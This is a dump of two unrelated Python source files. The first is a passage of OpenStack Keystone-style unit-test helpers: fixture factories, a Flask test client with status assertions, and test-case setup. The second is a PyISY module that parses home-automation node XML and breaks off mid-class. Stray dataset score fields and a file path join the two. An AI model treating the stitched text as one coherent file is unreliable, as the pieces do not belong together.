ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
'type': uuid.uuid4().hex,
}
ref.update(kwargs)
return ref
NEEDS_REGION_ID = object()
def new_endpoint_ref(service_id, interface='public',
region_id=NEEDS_REGION_ID, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'interface': interface,
'service_id': service_id,
'url': 'https://' + uuid.uuid4().hex + '.com',
}
if region_id is NEEDS_REGION_ID:
ref['region_id'] = uuid.uuid4().hex
elif region_id is None and kwargs.get('region') is not None:
# pre-3.2 form endpoints are not supported by this function
raise NotImplementedError("use new_endpoint_ref_with_region")
else:
ref['region_id'] = region_id
ref.update(kwargs)
return ref
def new_endpoint_group_ref(filters, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'filters': filters,
'name': uuid.uuid4().hex
}
ref.update(kwargs)
return ref
def new_endpoint_ref_with_region(service_id, region, interface='public',
**kwargs):
"""Define an endpoint_ref having a pre-3.2 form.
Contains the deprecated 'region' instead of 'region_id'.
"""
ref = new_endpoint_ref(service_id, interface, region=region,
region_id='invalid', **kwargs)
del ref['region_id']
return ref
def new_domain_ref(**kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
'tags': [],
'options': {}
}
ref.update(kwargs)
return ref
def new_project_ref(domain_id=None, is_domain=False, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
'domain_id': domain_id,
'is_domain': is_domain,
'tags': [],
'options': {}
}
# NOTE(henry-nash): We don't include parent_id in the initial list above
# since specifying it is optional depending on where the project sits in
# the hierarchy (and a parent_id of None has meaning - i.e. it's a top
# level project).
ref.update(kwargs)
return ref
def new_user_ref(domain_id, project_id=None, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'enabled': True,
'domain_id': domain_id,
'email': uuid.uuid4().hex,
'password': <PASSWORD>,
}
if project_id:
ref['default_project_id'] = project_id
ref.update(kwargs)
return ref
def new_federated_user_ref(idp_id=None, protocol_id=None, **kwargs):
ref = {
'idp_id': idp_id or 'ORG_IDP',
'protocol_id': protocol_id or 'saml2',
'unique_id': uuid.uuid4().hex,
'display_name': uuid.uuid4().hex,
}
ref.update(kwargs)
return ref
def new_mapping_ref(mapping_id=None, rules=None, **kwargs):
ref = {
'id': mapping_id or uuid.uuid4().hex,
'rules': rules or []
}
ref.update(kwargs)
return ref
def new_protocol_ref(protocol_id=None, idp_id=None, mapping_id=None, **kwargs):
ref = {
'id': protocol_id or 'saml2',
'idp_id': idp_id or 'ORG_IDP',
'mapping_id': mapping_id or uuid.uuid4().hex
}
ref.update(kwargs)
return ref
def new_identity_provider_ref(idp_id=None, **kwargs):
ref = {
'id': idp_id or 'ORG_IDP',
'enabled': True,
'description': '',
}
ref.update(kwargs)
return ref
def new_service_provider_ref(**kwargs):
ref = {
'auth_url': 'https://' + uuid.uuid4().hex + '.com',
'enabled': True,
'description': uuid.uuid4().hex,
'sp_url': 'https://' + uuid.uuid4().hex + '.com',
'relay_state_prefix': CONF.saml.relay_state_prefix
}
ref.update(kwargs)
return ref
def new_group_ref(domain_id, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'domain_id': domain_id
}
ref.update(kwargs)
return ref
def new_credential_ref(user_id, project_id=None, type='cert', **kwargs):
ref = {
'id': uuid.uuid4().hex,
'user_id': user_id,
'type': type,
}
if project_id:
ref['project_id'] = project_id
if 'blob' not in kwargs:
ref['blob'] = uuid.uuid4().hex
ref.update(kwargs)
return ref
def new_cert_credential(user_id, project_id=None, blob=None, **kwargs):
if blob is None:
blob = {'access': uuid.uuid4().hex, 'secret': uuid.uuid4().hex}
credential = new_credential_ref(user_id=user_id,
project_id=project_id,
blob=json.dumps(blob),
type='cert',
**kwargs)
return blob, credential
def new_ec2_credential(user_id, project_id=None, blob=None, **kwargs):
if blob is None:
blob = {
'access': uuid.uuid4().hex,
'secret': uuid.uuid4().hex,
'trust_id': None
}
if 'id' not in kwargs:
access = blob['access'].encode('utf-8')
kwargs['id'] = hashlib.sha256(access).hexdigest()
credential = new_credential_ref(user_id=user_id,
project_id=project_id,
blob=json.dumps(blob),
type='ec2',
**kwargs)
return blob, credential
def new_totp_credential(user_id, project_id=None, blob=None):
if not blob:
# NOTE(notmorgan): 20 bytes of data from os.urandom for
# a totp secret.
blob = base64.b32encode(os.urandom(20)).decode('utf-8')
credential = new_credential_ref(user_id=user_id,
project_id=project_id,
blob=blob,
type='totp')
return credential
def new_application_credential_ref(roles=None,
name=None,
expires=None,
secret=None):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
}
if roles:
ref['roles'] = roles
if secret:
ref['secret'] = secret
if isinstance(expires, str):
ref['expires_at'] = expires
elif isinstance(expires, dict):
ref['expires_at'] = (
timeutils.utcnow() + datetime.timedelta(**expires)
).strftime(TIME_FORMAT)
elif expires is None:
pass
else:
raise NotImplementedError('Unexpected value for "expires"')
return ref
def new_role_ref(**kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'domain_id': None,
'options': {},
}
ref.update(kwargs)
return ref
def new_policy_ref(**kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
# Store serialized JSON data as the blob to mimic real world usage.
'blob': json.dumps({'data': uuid.uuid4().hex, }),
'type': uuid.uuid4().hex,
}
ref.update(kwargs)
return ref
def new_domain_config_ref(**kwargs):
ref = {
"identity": {
"driver": "ldap"
},
"ldap": {
"url": "ldap://myldap.com:389/",
"user_tree_dn": "ou=Users,dc=my_new_root,dc=org"
}
}
ref.update(kwargs)
return ref
def new_trust_ref(trustor_user_id, trustee_user_id, project_id=None,
impersonation=None, expires=None, role_ids=None,
role_names=None, remaining_uses=None,
allow_redelegation=False, redelegation_count=None, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'trustor_user_id': trustor_user_id,
'trustee_user_id': trustee_user_id,
'impersonation': impersonation or False,
'project_id': project_id,
'remaining_uses': remaining_uses,
'allow_redelegation': allow_redelegation,
}
if isinstance(redelegation_count, int):
ref.update(redelegation_count=redelegation_count)
if isinstance(expires, str):
ref['expires_at'] = expires
elif isinstance(expires, dict):
ref['expires_at'] = (
timeutils.utcnow() + datetime.timedelta(**expires)
).strftime(TIME_FORMAT)
elif expires is None:
pass
else:
raise NotImplementedError('Unexpected value for "expires"')
role_ids = role_ids or []
role_names = role_names or []
if role_ids or role_names:
ref['roles'] = []
for role_id in role_ids:
ref['roles'].append({'id': role_id})
for role_name in role_names:
ref['roles'].append({'name': role_name})
ref.update(kwargs)
return ref
def new_registered_limit_ref(**kwargs):
ref = {
'service_id': uuid.uuid4().hex,
'resource_name': uuid.uuid4().hex,
'default_limit': 10,
'description': uuid.uuid4().hex
}
ref.update(kwargs)
return ref
def new_limit_ref(**kwargs):
ref = {
'service_id': uuid.uuid4().hex,
'resource_name': uuid.uuid4().hex,
'resource_limit': 10,
'description': uuid.uuid4().hex
}
ref.update(kwargs)
return ref
def create_user(api, domain_id, **kwargs):
"""Create a user via the API. Keep the created password.
The password is saved and restored when api.create_user() is called.
Only use this routine if there is a requirement for the user object to
have a valid password after api.create_user() is called.
"""
user = new_user_ref(domain_id=domain_id, **kwargs)
password = user['password']
user = api.create_user(user)
user['password'] = password
return user
def _assert_expected_status(f):
"""Add `expected_status_code` as an argument to the test_client methods.
`expected_status_code` must be passed as a kwarg.
"""
TEAPOT_HTTP_STATUS = 418
_default_expected_responses = {
'get': http.client.OK,
'head': http.client.OK,
'post': http.client.CREATED,
'put': http.client.NO_CONTENT,
'patch': http.client.OK,
'delete': http.client.NO_CONTENT,
}
@functools.wraps(f)
def inner(*args, **kwargs):
# Get the "expected_status_code" kwarg if supplied. If not supplied use
        # the `_default_expected_responses` mapping, or fall through to
# "HTTP OK" if the method is somehow unknown.
expected_status_code = kwargs.pop(
'expected_status_code',
_default_expected_responses.get(
f.__name__.lower(), http.client.OK))
response = f(*args, **kwargs)
# Logic to verify the response object is sane. Expand as needed
if response.status_code == TEAPOT_HTTP_STATUS:
# NOTE(morgan): We use 418 internally during tests to indicate
# an un-routed HTTP call was made. This allows us to avoid
# misinterpreting HTTP 404 from Flask and HTTP 404 from a
# resource that is not found (e.g. USER NOT FOUND) programmatically
raise AssertionError("I AM A TEAPOT(418): %s" % response.data)
if response.status_code != expected_status_code:
raise AssertionError(
'Expected HTTP Status does not match observed HTTP '
'Status: %(expected)s != %(observed)s (%(data)s)' % {
'expected': expected_status_code,
'observed': response.status_code,
'data': response.data})
# return the original response object
return response
return inner
class KeystoneFlaskTestClient(flask_testing.FlaskClient):
"""Subclass of flask.testing.FlaskClient implementing assertions.
Implements custom "expected" HTTP Status assertion for
GET/HEAD/PUT/PATCH/DELETE.
"""
@_assert_expected_status
def get(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).get(*args, **kwargs)
@_assert_expected_status
def head(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).head(*args, **kwargs)
@_assert_expected_status
def post(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).post(*args, **kwargs)
@_assert_expected_status
def patch(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).patch(*args, **kwargs)
@_assert_expected_status
def put(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).put(*args, **kwargs)
@_assert_expected_status
def delete(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).delete(*args, **kwargs)
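# Usage sketch (illustrative): test cases obtain this client from loadapp() below
# and can override the per-method status assertion where needed, e.g.
#
#     with self.test_client() as c:
#         c.get('/v3')                                              # asserts 200 OK
#         c.get('/v3/missing', expected_status_code=http.client.NOT_FOUND)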
class BaseTestCase(testtools.TestCase):
"""Light weight base test class.
This is a placeholder that will eventually go away once the
setup/teardown in TestCase is properly trimmed down to the bare
essentials. This is really just a play to speed up the tests by
eliminating unnecessary work.
"""
def setUp(self):
super(BaseTestCase, self).setUp()
self.useFixture(fixtures.NestedTempfile())
self.useFixture(fixtures.TempHomeDir())
self.useFixture(fixtures.MockPatchObject(sys, 'exit',
side_effect=UnexpectedExit))
self.useFixture(log_fixture.get_logging_handle_error_fixture())
warnings.filterwarnings('error', category=DeprecationWarning,
module='^keystone\\.')
warnings.filterwarnings(
'ignore', category=DeprecationWarning,
message=r"Using function/method 'db_version\(\)' is deprecated")
warnings.simplefilter('error', exc.SAWarning)
if hasattr(exc, "RemovedIn20Warning"):
warnings.simplefilter('ignore', exc.RemovedIn20Warning)
self.addCleanup(warnings.resetwarnings)
# Ensure we have an empty threadlocal context at the start of each
# test.
self.assertIsNone(oslo_context.get_current())
self.useFixture(oslo_ctx_fixture.ClearRequestContext())
orig_debug_level = ldap.get_option(ldap.OPT_DEBUG_LEVEL)
self.addCleanup(ldap.set_option, ldap.OPT_DEBUG_LEVEL,
orig_debug_level)
orig_tls_cacertfile = ldap.get_option(ldap.OPT_X_TLS_CACERTFILE)
if orig_tls_cacertfile is None:
orig_tls_cacertfile = ''
self.addCleanup(ldap.set_option, ldap.OPT_X_TLS_CACERTFILE,
orig_tls_cacertfile)
orig_tls_cacertdir = ldap.get_option(ldap.OPT_X_TLS_CACERTDIR)
# Setting orig_tls_cacertdir to None is not allowed.
if orig_tls_cacertdir is None:
orig_tls_cacertdir = ''
self.addCleanup(ldap.set_option, ldap.OPT_X_TLS_CACERTDIR,
orig_tls_cacertdir)
orig_tls_require_cert = ldap.get_option(ldap.OPT_X_TLS_REQUIRE_CERT)
self.addCleanup(ldap.set_option, ldap.OPT_X_TLS_REQUIRE_CERT,
orig_tls_require_cert)
self.addCleanup(ks_ldap.PooledLDAPHandler.connection_pools.clear)
def cleanup_instance(self, *names):
"""Create a function suitable for use with self.addCleanup.
:returns: a callable that uses a closure to delete instance attributes
"""
def cleanup():
for name in names:
# TODO(dstanek): remove this 'if' statement once
# load_backend in test_backend_ldap is only called once
# per test
if hasattr(self, name):
delattr(self, name)
return cleanup
def skip_if_env_not_set(self, env_var):
if not os.environ.get(env_var):
self.skipTest('Env variable %s is not set.' % env_var)
def skip_test_overrides(self, *args, **kwargs):
if self._check_for_method_in_parents(self._testMethodName):
return super(BaseTestCase, self).skipTest(*args, **kwargs)
raise Exception('%r is not a previously defined test method'
% self._testMethodName)
def _check_for_method_in_parents(self, name):
# skip first to get to parents
for cls in self.__class__.__mro__[1:]:
if hasattr(cls, name):
return True
return False
def loadapp(self, name='public'):
app = flask_app.application_factory(name)
app.testing = True
app.test_client_class = KeystoneFlaskTestClient
# NOTE(morgan): any unexpected 404s, not handled by the routed apis,
# is a hard error and should not pass testing.
def page_not_found_teapot(e):
content = (
'TEST PROGRAMMING ERROR - Reached a 404 from an unrouted (`%s`'
') path. Be sure the test is requesting the right resource '
'and that all blueprints are registered with the flask app.' %
flask.request.url)
return content, 418
app.register_error_handler(404, page_not_found_teapot)
self.test_client = app.test_client
self.test_request_context = app.test_request_context
self.cleanup_instance('test_request_context')
self.cleanup_instance('test_client')
return keystone_flask.setup_app_middleware(app)
class TestCase(BaseTestCase):
def config_files(self):
return []
def _policy_fixture(self):
return ksfixtures.Policy(self.config_fixture)
@contextlib.contextmanager
def make_request(self, path='/', **kwargs):
# standup a fake app and request context with a passed in/known
# environment.
is_admin = kwargs.pop('is_admin', False)
environ = kwargs.setdefault('environ', {})
query_string = kwargs.pop('query_string', None)
if query_string:
# Make sure query string is properly added to the context
path = '{path}?{qs}'.format(path=path, qs=query_string)
if not environ.get(context.REQUEST_CONTEXT_ENV):
environ[context.REQUEST_CONTEXT_ENV] = context.RequestContext(
is_admin=is_admin,
authenticated=kwargs.pop('authenticated', True))
# Create a dummy flask app to work with
app = flask.Flask(__name__)
with app.test_request_context(path=path, environ_overrides=environ):
yield
def config_overrides(self):
# NOTE(morganfainberg): enforce config_overrides can only ever be
# called a single time.
assert self.__config_overrides_called is False
self.__config_overrides_called = True
signing_certfile = 'examples/pki/certs/signing_cert.pem'
signing_keyfile = 'examples/pki/private/signing_key.pem'
self.useFixture(self._policy_fixture())
self.config_fixture.config(
# TODO(morganfainberg): Make Cache Testing a separate test case
# in tempest, and move it out of the base unit tests.
group='cache',
backend='dogpile.cache.memory',
enabled=True,
proxies=['oslo_cache.testing.CacheIsolatingProxy'])
self.config_fixture.config(
group='catalog',
driver='sql',
template_file=dirs.tests('default_catalog.templates'))
self.config_fixture.config(
group='saml', certfile=signing_certfile, keyfile=signing_keyfile)
self.config_fixture.config(
default_log_levels=[
'amqp=WARN',
'amqplib=WARN',
'boto=WARN',
'qpid=WARN',
'sqlalchemy=WARN',
'suds=INFO',
'oslo.messaging=INFO',
'iso8601=WARN',
'requests.packages.urllib3.connectionpool=WARN',
'routes.middleware=INFO',
'stevedore.extension=INFO',
'keystone.notifications=INFO',
'keystone.identity.backends.ldap.common=INFO',
])
# NOTE(notmorgan): Set password rounds low here to ensure speedy
# tests. This is explicitly set because the tests here are not testing
# the integrity of the password hashing, just that the correct form
# of hashing has been used. Note that 4 is the lowest for bcrypt
# allowed in the `[identity] password_hash_rounds` setting
self.config_fixture.config(group='identity', password_hash_rounds=4)
self.useFixture(
ksfixtures.KeyRepository(
self.config_fixture,
'fernet_tokens',
CONF.fernet_tokens.max_active_keys
)
)
self.useFixture(
ksfixtures.KeyRepository(
self.config_fixture,
'fernet_receipts',
CONF.fernet_receipts.max_active_keys
)
)
def _assert_config_overrides_called(self):
assert self.__config_overrides_called is True
def setUp(self):
super(TestCase, self).setUp()
self.__config_overrides_called = False
self.__load_backends_called = False
self.config_fixture = self.useFixture(config_fixture.Config(CONF))
self.addCleanup(delattr, self, 'config_fixture')
self.config(self.config_files())
# NOTE(morganfainberg): mock the auth plugin setup to use the config
# fixture which automatically unregisters options when performing
# cleanup.
def mocked_register_auth_plugin_opt(conf, opt):
self.config_fixture.register_opt(opt, group='auth')
self.useFixture(fixtures.MockPatchObject(
keystone.conf.auth, '_register_auth_plugin_opt',
new=mocked_register_auth_plugin_opt))
self.config_overrides()
# explicitly load auth configuration
keystone.conf.auth.setup_authentication()
# NOTE(morganfainberg): ensure config_overrides has been called.
self.addCleanup(self._assert_config_overrides_called)
self.useFixture(fixtures.FakeLogger(level=log.DEBUG))
# NOTE(morganfainberg): This code is a copy from the oslo-incubator
# log module. This is not in a function or otherwise available to use
# without having a CONF object to setup logging. This should help to
# reduce the log size by limiting what we log (similar to how Keystone
# would run under mod_wsgi).
for pair in CONF.default_log_levels:
mod, _sep, level_name = pair.partition('=')
logger = log.getLogger(mod)
logger.logger.setLevel(level_name)
self.useFixture(ksfixtures.Cache())
# Clear the registry of providers so that providers from previous
# tests aren't used.
self.addCleanup(provider_api.ProviderAPIs._clear_registry_instances)
# Clear the registry of JSON Home Resources
self.addCleanup(json_home.JsonHomeResources._reset)
# Ensure Notification subscriptions and resource types are empty
self.addCleanup(notifications.clear_subscribers)
self.addCleanup(notifications.reset_notifier)
def config(self, config_files):
sql.initialize()
CONF(args=[], project='keystone', default_config_files=config_files)
def load_backends(self):
"""Initialize each manager and assigns them to an attribute."""
# TODO(morgan): Ensure our tests only ever call load_backends
# a single time via this method. for now just clear the registry
# if we are reloading.
provider_api.ProviderAPIs._clear_registry_instances()
self.useFixture(ksfixtures.BackendLoader(self))
def load_fixtures(self, fixtures):
"""Hacky basic and naive fixture loading based on a python module.
Expects that the various APIs into the various services are already
defined on `self`.
"""
# NOTE(dstanek): create a list of attribute names to be removed
# from this instance during cleanup
fixtures_to_cleanup = []
# TODO(termie): doing something from json, probably based on Django's
# loaddata will be much preferred.
if (hasattr(self, 'identity_api') and
hasattr(self, 'assignment_api') and
hasattr(self, 'resource_api')):
try:
PROVIDERS.resource_api.create_domain(
resource_base.NULL_DOMAIN_ID, fixtures.ROOT_DOMAIN)
except exception.Conflict:
# the root domain already exists, skip now.
pass
for domain in fixtures.DOMAINS:
rv = PROVIDERS.resource_api.create_domain(domain['id'], domain)
attrname = 'domain_%s' % domain['id']
setattr(self, attrname, rv)
fixtures_to_cleanup.append(attrname)
for project in fixtures.PROJECTS:
project_attr_name = 'project_%s' % project['name'].lower()
rv = PROVIDERS.resource_api.create_project(
project['id'], project)
setattr(self, project_attr_name, rv)
fixtures_to_cleanup.append(project_attr_name)
for role in fixtures.ROLES:
rv = PROVIDERS.role_api.create_role(role['id'], role)
attrname = 'role_%s' % role['name']
setattr(self, attrname, rv)
fixtures_to_cleanup.append(attrname)
for user in fixtures.USERS:
user_copy = user.copy()
projects = user_copy.pop('projects')
# For users, the manager layer will generate the ID
user_copy = PROVIDERS.identity_api.create_user(user_copy)
# Our tests expect that the password is still in the user
# record so that they can reference it, so put it back into
# the dict returned.
user_copy['password'] = user['password']
# fixtures.ROLES[2] is the _member_ role.
for project_id in projects:
PROVIDERS.assignment_api.add_role_to_user_and_project(
user_copy['id'], project_id, fixtures.ROLES[2]['id'])
# Use the ID from the fixture as the attribute name, so
# that our tests can easily reference each user dict, while
# the ID in the dict will be the real public ID.
attrname = 'user_%s' % user['name']
setattr(self, attrname, user_copy)
fixtures_to_cleanup.append(attrname)
for role_assignment in fixtures.ROLE_ASSIGNMENTS:
role_id = role_assignment['role_id']
user = role_assignment['user']
project_id = role_assignment['project_id']
user_id = getattr(self, 'user_%s' % user)['id']
PROVIDERS.assignment_api.add_role_to_user_and_project(
user_id, project_id, role_id)
self.addCleanup(self.cleanup_instance(*fixtures_to_cleanup))
def assertCloseEnoughForGovernmentWork(self, a, b, delta=3):
"""Assert that two datetimes are nearly equal within a small delta.
:param delta: Maximum allowable time delta, defined in seconds.
"""
if a == b:
# Short-circuit if the values are the same.
return
msg = '%s != %s within %s delta' % (a, b, delta)
self.assertLessEqual(abs(a - b).seconds, delta, msg)
def assertTimestampEqual(self, expected, value):
# Compare two timestamps but ignore the microseconds part
# of the expected timestamp. Keystone does not track microseconds and
        # is working to eliminate microseconds from the datetimes it uses.
expected = timeutils.parse_isotime(expected).replace(microsecond=0)
value = timeutils.parse_isotime(value).replace(microsecond=0)
self.assertEqual(
expected,
value,
"%s != %s" % (expected, value))
def assertNotEmpty(self, l):
self.assertGreater(len(l), 0)
def assertUserDictEqual(self, expected, observed, message=''):
"""Assert that a user dict is equal to another user dict.
User dictionaries have some variable values that should be ignored in
the comparison. This method is a helper that strips those elements out
        when comparing the user dictionary. This normalizes the differences
        that should not affect the comparison.
"""
# NOTE(notmorgan): An empty option list is the same as no options being
        # specified in the user_ref. This removes options from observed when it
        # is empty and options is not specified in the expected value.
if ('options' in observed and not observed['options'] and
'options' not in expected):
observed = observed.copy()
del observed['options']
self.assertDictEqual(expected, observed, message)
@property
def ipv6_enabled(self):
if socket.has_ipv6:
sock = None
try:
sock = socket.socket(socket.AF_INET6)
# NOTE(Mouad): Try to bind to IPv6 loopback ip address.
sock.bind(("::1", 0))
return True
except socket.error:
pass
finally:
if sock:
sock.close()
return False
def skip_if_no_ipv6(self):
if not self.ipv6_enabled:
raise self.skipTest("IPv6 is not enabled in the system")
class SQLDriverOverrides(object):
"""A mixin for consolidating sql-specific test overrides."""
def config_overrides(self):
super(SQLDriverOverrides, self).config_overrides()
# SQL specific driver overrides
self.config_fixture.config(group='catalog', driver='sql')
self.config_fixture.config(group='identity', driver='sql')
self.config_fixture.config(group='policy', driver='sql')
self.config_fixture.config(group='trust', driver='sql')
| 1.382813 | 1 |
PyISY/Nodes/__init__.py | sneelco/PyISY | 0 | 6985 | <filename>PyISY/Nodes/__init__.py
from .group import Group
from .node import (Node, parse_xml_properties, ATTR_ID)
from time import sleep
from xml.dom import minidom
class Nodes(object):
"""
This class handles the ISY nodes. This class can be used as a dictionary to
navigate through the controller's structure to objects of type
:class:`~PyISY.Nodes.Node` and :class:`~PyISY.Nodes.Group` that represent
objects on the controller.
| parent: ISY class
| root: [optional] String representing the current navigation level's ID
| nids: [optional] list of node ids
| nnames: [optional] list of node names
| nparents: [optional] list of node parents
| nobjs: [optional] list of node objects
| ntypes: [optional] list of node types
| xml: [optional] String of xml data containing the configuration data
:ivar allLowerNodes: Returns all nodes beneath current level
:ivar children: A list of the object's children.
:ivar hasChildren: Indicates if object has children
:ivar name: The name of the current folder in navigation.
"""
nids = []
nnames = []
nparents = []
nobjs = []
ntypes = []
def __init__(self, parent, root=None, nids=None, nnames=None,
nparents=None, nobjs=None, ntypes=None, xml=None):
self.parent = parent
self.root = root
if nids is not None and nnames is not None and nparents is not None \
and nobjs is not None and ntypes is not None:
self.nids = nids
self.nnames = nnames
self.nparents = nparents
self.nobjs = nobjs
self.ntypes = ntypes
elif xml is not None:
self.parse(xml)
def __str__(self):
""" Returns string representation of the nodes/folders/groups. """
if self.root is None:
return 'Folder <root>'
else:
ind = self.nids.index(self.root)
if self.ntypes[ind] == 'folder':
return 'Folder (' + self.root + ')'
elif self.ntypes[ind] == 'group':
return 'Group (' + self.root + ')'
else:
return 'Node (' + self.root + ')'
def __repr__(self):
""" Creates a pretty representation of the nodes/folders/groups. """
# get and sort children
folders = []
groups = []
nodes = []
for child in self.children:
            if child[0] == 'folder':
                folders.append(child)
            elif child[0] == 'group':
                groups.append(child)
            elif child[0] == 'node':
nodes.append(child)
# initialize data
folders.sort(key=lambda x: x[1])
groups.sort(key=lambda x: x[1])
nodes.sort(key=lambda x: x[1])
out = str(self) + '\n' + self.__reprFolders__(folders) + \
self.__reprGroups__(groups) + self.__reprNodes__(nodes)
return out
def __reprFolders__(self, folders):
# format folders
out = ''
for fold in folders:
fold_obj = self[fold[2]]
out += ' + ' + fold[1] + ': Folder(' + fold[2] + ')\n'
for line in repr(fold_obj).split('\n')[1:]:
if len(line) > 0:
out += ' | ' + line + '\n'
out += ' -\n'
return out
def __reprGroups__(self, groups):
# format groups
out = ''
for group in groups:
out += ' ' + group[1] + ': Group(' + group[2] + ')\n'
return out
def __reprNodes__(self, nodes):
# format nodes
out = ''
for node in nodes:
node_obj = self[node[2]]
if node_obj.hasChildren:
out += ' + '
else:
out += ' '
out += node[1] + ': Node(' + node[2] + ')\n'
if node_obj.hasChildren:
for line in repr(node_obj).split('\n')[1:]:
if len(line) > 0:
out += ' | ' + line + '\n'
out += ' -\n'
return out
def __iter__(self):
"""
Returns an iterator for each node below the current navigation level.
"""
iter_data = self.allLowerNodes
return NodeIterator(self, iter_data, delta=1)
def __reversed__(self):
""" Returns the iterator in reverse order. """
iter_data = self.allLowerNodes
return NodeIterator(self, iter_data, delta=-1)
def _upmsg(self, xmldoc):
"""Updates nodes from event stream message."""
nid = xmldoc.getElementsByTagName('node')[0].firstChild.toxml()
nval = int(xmldoc.getElementsByTagName('action')[0].firstChild.toxml())
ctrl = xmldoc.getElementsByTagName('control')[0].firstChild.toxml()
try:
if ctrl == 'ST':
self.getByID(nid).status.update(nval, force=True, silent=True)
self.parent.log.info('ISY Updated Node: ' + nid)
else:
nid = '{}_{}'.format(nid, ctrl)
status = self.getByID(nid).status
status.update(nval, force=True, silent=True)
self.parent.log.info('ISY Updated Property: ' + nid)
except ValueError:
            self.parent.log.warning('Unable to find node: ' + nid)
def _controlmsg(self, xmldoc):
"""Passes Control events from an event stream message to nodes, for
sending out to subscribers."""
try:
nid = xmldoc.getElementsByTagName('node')[0].firstChild.toxml()
cntrl = xmldoc.getElementsByTagName('control')[0].firstChild.toxml()
except IndexError:
# If there is no node associated with the control message we ignore it
return
self.getByID(nid).controlEvents.notify(cntrl)
self.parent.log.info('ISY Node Control Event: ' + nid + ' ' + cntrl)
def parse(self, xml):
"""
Parses the xml data.
| xml: String of the xml data
"""
try:
xmldoc = minidom.parseString(xml)
except:
self.parent.log.error('ISY Could not parse nodes, '
+ 'poorly formatted XML.')
else:
# get nodes
ntypes = ['folder', 'node', 'group']
for ntype in ntypes:
features = xmldoc.getElementsByTagName(ntype)
for feature in features:
nid = feature.getElementsByTagName('address')[0] \
.firstChild.toxml()
nname = feature.getElementsByTagName('name')[0] \
.firstChild.toxml()
try:
nparent = feature.getElementsByTagName('parent')[0] \
.firstChild.toxml()
except IndexError:
nparent = None
try:
parent_nid = feature.getElementsByTagName('pnode')[0] \
.firstChild.toxml()
except IndexError:
parent_nid = None
try:
type = feature.getElementsByTagName('type')[0] \
.firstChild.toxml()
except IndexError:
type = None
try:
nodeDefId = feature.attributes['nodeDefId'].value
except KeyError:
nodeDefId = None
if ntype == 'folder':
self.insert(nid, nname, nparent, None, ntype)
elif ntype == 'node':
node_xml = self.parent.conn.getNode(nid)
node_doc = minidom.parseString(node_xml) # type: xml.dom.minidom.Document
node = node_doc.getElementsByTagName('node')[0]
(state_val, state_uom, state_prec,
aux_props) = parse_xml_properties(node_doc)
dimmable = '%' in state_uom
self.insert(nid, nname, nparent,
Node(self, nid, state_val, nname,
dimmable,
uom=state_uom, prec=state_prec,
aux_properties=aux_props,
node_def_id=nodeDefId,
parent_nid=parent_nid,
type=type),
ntype)
for id, prop in aux_props.items():
if id == 'ST':
continue
prop_id = '{}_{}'.format(nid, id)
prop_name = '{} {}'.format(nname, id)
self.insert(prop_id, prop_name, nparent,
Node(self, prop_id, prop['value'],
prop_name, False,
uom=prop['uom'],
prec=prop['prec']),
'property')
elif ntype == 'group':
flag = feature.attributes['flag'].value
                        # Ignore groups with the 0x08 flag bit set: that is an ISY scene that
                        # contains every device/scene, so it would reference scenes we have not
                        # seen yet (and therefore not yet defined), and it includes the ISY MAC
                        # address in newer ISY firmware (5.0.6+).
if int(flag) & 0x08:
self.parent.log.info('Skipping group flag=' + flag + " " + nid )
else:
mems = feature.getElementsByTagName('link')
# Build list of members
members = [mem.firstChild.nodeValue for mem in mems]
# Build list of controllers
controllers = []
for mem in mems:
if int(mem.attributes['type'].value) == 16:
controllers.append(mem.firstChild.nodeValue)
self.insert(nid, nname, nparent,
Group(self, nid, nname, members, controllers), ntype)
self.parent.log.info('ISY Loaded Nodes')
def update(self, waitTime=0):
"""
Updates the contents of the class
| waitTime: [optional] Amount of seconds to wait before updating
"""
sleep(waitTime)
xml = self.parent.conn.updateNodes()
if xml is not None:
try:
xmldoc = minidom.parseString(xml)
except:
self.parent.log.error('ISY Could not parse nodes, '
+ 'poorly formatted XML.')
else:
for feature in xmldoc.getElementsByTagName('node'):
nid = feature.attributes['id'].value
(state_val, state_uom, state_prec,
aux_props) = parse_xml_properties(feature)
dimmable = '%' in state_uom
if nid in self.nids:
node = self.getByID(nid)
node.uom = state_uom
node.prec = state_prec
node.dimmable = dimmable
node.status.update(state_val, silent=True)
if len(node.aux_properties) > 0:
node_xml = self.parent.conn.getNode(nid)
node_doc = minidom.parseString(node_xml)
(state_val, state_uom, state_prec,
aux_props) = parse_xml_properties(node_doc)
for key in aux_props.keys():
pid = '{}_{}'.format(nid, key)
prop = self.getByID(pid)
                                prop.status.update(aux_props[key]['value'], silent=True)
else:
                        node = Node(self, nid, state_val, ' ', dimmable,
                                    uom=state_uom, prec=state_prec,
                                    aux_properties=aux_props)
                        self.insert(nid, ' ', None, node, 'node')
self.parent.log.info('ISY Updated Nodes')
else:
self.parent.log.warning('ISY Failed to update nodes.')
def insert(self, nid, nname, nparent, nobj, ntype):
"""
Inserts a new node into the lists.
| nid: node id
| nname: node name
| nparent: node parent
| nobj: node object
| ntype: node type
"""
self.nids.append(nid)
self.nnames.append(nname)
self.nparents.append(nparent)
self.ntypes.append(ntype)
self.nobjs.append(nobj)
def __getitem__(self, val):
"""
